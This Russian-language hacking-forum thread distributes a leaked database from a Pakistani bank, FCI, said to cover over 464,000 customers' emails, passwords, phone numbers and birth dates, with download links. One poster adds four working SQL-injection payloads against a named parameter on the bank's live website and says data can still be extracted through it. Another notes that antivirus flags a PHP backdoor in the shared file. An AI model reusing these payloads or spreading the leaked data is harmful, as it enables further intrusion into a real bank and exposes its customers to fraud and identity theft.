SQL FCIbank - Пакистанский банк

[N9XDZ]

В марте 2021 года Пакистанский банк FCI допустил утечку данных, которое затронуло более 464 тысяч только пакистанских клиентов.
Сайт: https://www.fcibank.com.pk/
Скомпрометированные данные: Email Addresses, First Names, Last Names, Usernames, Passwords, IP Addresses, Audits, Phone Numbers (little), User Data (Bio,Education,Profession), Partner Links, Weird Symbols probably Pakistani wording, Dates of Birth, Website Support Data (Reports,Tickets)
Размер в распакованном виде: 3.83GB

FCIbank.com.pk

MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.

www.mediafire.com

пароль местный

 

[C0rtex]

ТС ты же не против если я дополню?
под таким же хайдом или наверное выше

 

[C0rtex]

а вот и сам уязвимый параметр, через который до сих пор можно вытащить все что угодно, с момента ихней утечки там и никто не добавил защиту туда, видимо так и наплевать на своих граждан

Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: https://www.fcibank.com.pk:443/index.php?route=common/page&pageid={ED4AFC8A-72FD-785D-C017-0CF3CD122672' RLIKE (SELECT (CASE WHEN (8087=8087) THEN 0x7b45443441464338412d373246442d373835442d433031372d304346334344313232363732 ELSE 0x28 END))-- upXp+--+-}

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: https://www.fcibank.com.pk:443/index.php?route=common/page&pageid={ED4AFC8A-72FD-785D-C017-0CF3CD122672' AND (SELECT 8564 FROM(SELECT COUNT(*),CONCAT(0x716a627071,(SELECT (ELT(8564=8564,1))),0x71627a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- yjpz+--+-}

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: https://www.fcibank.com.pk:443/index.php?route=common/page&pageid={ED4AFC8A-72FD-785D-C017-0CF3CD122672' AND (SELECT 7377 FROM (SELECT(SLEEP(10)))ynqE)-- hWtn+--+-}

Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: https://www.fcibank.com.pk:443/index.php?route=common/page&pageid={ED4AFC8A-72FD-785D-C017-0CF3CD122672' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627071,0x4b754c4c6c4348694c5579684156747657744c686876524f654a714d6b49794a797076506c6b4d47,0x71627a7a71),NULL,NULL,NULL,NULL#+--+-}
---

 

[solovey]

вот и сам уязвимый параметр

в файле выложенном на RF VT находит
Backdoor:PHP/Yorcirekrikseng.I
может там просто до хрена уязвимостей ?

 

[C0rtex]

в файле выложенном на RF VT находит
Backdoor:PHP/Yorcirekrikseng.I
может там просто до хрена уязвимостей ?

без понятия я файлы не выкладывал, а конкретные уязвимые параметры

 

[N9XDZ]

Перезарядил)

GOLoad — Download

goload.download

без пароля